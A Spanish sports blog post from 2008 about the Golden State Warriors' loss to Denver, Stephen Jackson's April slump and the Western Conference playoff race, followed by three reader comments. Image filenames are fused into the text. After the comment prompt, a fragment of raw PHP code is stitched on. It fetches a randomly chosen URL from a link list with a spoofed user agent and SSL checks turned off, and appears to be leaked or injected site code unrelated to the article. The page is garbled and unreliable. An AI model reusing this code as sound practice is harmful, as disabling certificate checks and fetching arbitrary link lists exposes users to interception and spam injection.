Jackson y los Warriors se desinflan en el peor momento

11 de April de 2008 por MagicJohnson32

sjaxclapskings82 partidos de regular-season, y que tu temporada se vaya al traste por una derrota… Aunque aún mantienen posibilidades, los Warriors perdieron anoche ante los Nuggets buena parte de sus esperanzas de acceder a los Playoffs. En un duelo que enfrentaba a los dos equipos implicados en la lucha por la octava posición del Oeste, los de Denver se impusieron en Oakland por 114-105 y, de este modo, se sitúan un partido por delante de los Warriors a falta de tres para la conclusión de la fase regular. Por si fuera poco, los Nuggets se aseguraron las season-series con los californianos, cosa que obliga a Golden State a ganar dos partidos más que su rival.

Difícil. A Denver le resta una visita a Salt Lake City y dos partidos como local ante Rockets y Grizzlies. Los Warriors reciben a los Clippers, visitan Phoenix y finalizan en casa contra los Sonics. Todo parece destinado a decidirse en el Rockets-Nuggets y el Warriors-Suns, dando por hecho que Denver perderá en pista de los Jazz (la más difícil de la liga y donde sólo 4 equipos han ganado esta temporada) y que Clippers, Grizzlies y Sonics no pondrán mucho interés en ganar sus últimos partidos y perder posiciones en el próximo Draft.

Lo cierto es que los Warriors han llegado a este tramo decisivo en baja forma y muy condicionados por el mal momento que atraviesa Stephen Jackson. Captain Jax fue un jugador decisivo en el resurgir del equipo tras un inicio desastroso. Los Warriors empezaron la temporada con seis derrotas consecutivas, todas ellas sin Jackson, quien cumplía una de las muchas sanciones que han plagado su carrera. Su temporada y su actitud han sido ejemplares tanto en lo deportivo como en lo extradeportivo, un cambio de actitud que el propio jugador ha atribuido a la responsabilidad de ser padre. Cuando S-Jax se incorporó al equipo, Golden State venció 9 de sus siguientes 10 partidos.

alharrsjaxwrightSin embargo, Jackson está completando un mes de abril negro, en el que sólo ha anotado 22 de sus 76 lanzamientos. En las tres derrotas previas a la de anoche, el ex de Pacers se quedó por debajo de los 10 puntos (algo que sólo le sucedió una vez en marzo y cinco veces en toda la temporada). Y no es casual: de las ocho veces en las que Stephen Jackson no alcanzó la decena de puntos, los Warriors perdieron siete.

Así que los Warriors no sólo necesitan que Denver pierda sus partidos contra Jazz y Rockets, cosa más que posible; necesitan también que Stephen Jackson recupere el juego que lo convirtió en pieza clave e imprescindible.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Un factor muy importante en el juego de los Warriors ha sido el descaro.
    La alegría del juego sin presión por el resultado… porque lo normal era que perdieran contra Dallas (el año pasado) o contra sus poderosos rivales en el Wild Wild West de este año. Jugando muy hábilmente con la condición de favorito y los nervios de sus rivales.
    La cosa ha cambiado cuando han sido ellos los que estaban obligados a ganar para no quedarse fuera. El listón ha subido tanto que se han visto en el agua antes de tiempo.

    La carita que le vi anoche al Jackson éste, ya no era la de hace un par de semanas cuando cosía a triples a L.A. La cara era de acojono, de estar superado por las circunstancias.
    Curiosamente ha sido Denver quien les ha dado su propia medicina cuando eran ellos los que se veían fuera hace no mucho.

    Este equipo no se merece este final. Lástima.

      Citar

  2. Gallis dice:
    #2

    Pues sí, es una lástima…y coincido con Deer en que les ha podido la presión. El año pasado nadie contaba ni con su clasificación ni con que eliminaran a Dallas, pero este año los PO´s eran una obligación…y así no es tan fácil…

    Y la verdad es que es sorprendente la influencia de Stephen Jackson…y tras 82 partidos puede parecer un detalle nímio, pero aquel 0-6 del comienzo se ha revelado como una losa difícil de remontar.

    Aún es posible, aunque pinta muy mal…

      Citar

  3. MagicJohnson32 dice:
    #3

    Ojo, ojo, que el año pasado los Warriors se metieron en playoffs ganado 42 partidos. Este año pueden ganar 50 y quedarse fuera. Es brutal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>